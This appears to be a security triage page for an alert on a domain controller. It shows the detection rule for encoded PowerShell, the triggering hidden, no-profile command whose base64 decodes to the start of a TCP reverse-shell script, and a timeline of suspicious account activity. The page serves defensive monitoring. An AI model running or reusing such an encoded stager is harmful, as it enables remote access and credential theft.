Triage queue
// Operations
Encoded PowerShell executed on WIN-DC01
PowerShell ran a base64-encoded command block with a hidden window on a domain controller.
ALT-664EB4HighInvestigating
81Elevated
This alert has been escalated. Open the incident to see the full case.
Why this fired
Any event where processName contains powershell and commandLine contains -enc
PowerShell invoked with a base64-encoded command block, a common wrapper for staged payloads that defeats plaintext command inspection.
Triggering event
The exact record that satisfied the rule.
Process ExecutionHigh2026-09-04 14:36:29ZCrowdStrike Falcon
Encoded PowerShell command block executed with hidden window and execution policy bypass
powershell.exe -nop -w hidden -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAA=
What else was happening
Other activity for jsmith in the surrounding hour.
| Time | Event | Severity | Host |
|---|---|---|---|
| 2026-09-04 14:17:53Z | Authentication Failure | Low | WIN-DC01 |
| 2026-09-04 14:21:05Z | Authentication Failure | Low | WIN-DC01 |
| 2026-09-04 14:24:17Z | Authentication Failure | Low | WIN-DC01 |
| 2026-09-04 14:27:29Z | Authentication Success | High | WIN-DC01 |
| 2026-09-04 14:30:29Z | Mfa Method Removed | High | WIN-DC01 |
| 2026-09-04 14:33:29Z | User Created | Critical | WIN-DC01 |
| 2026-09-04 14:39:29Z | Credential Access | Critical | WIN-DC01 |
Alert
- Raised
- 7d ago
- Last updated
- 7d ago
- Risk score
- 81
- Source
- CrowdStrike Falcon
- Detected by
- Correlation rule
Entity risk
94Severe
jsmith carries a standing risk score derived from all of its activity, not just this alert.
Open the entity profile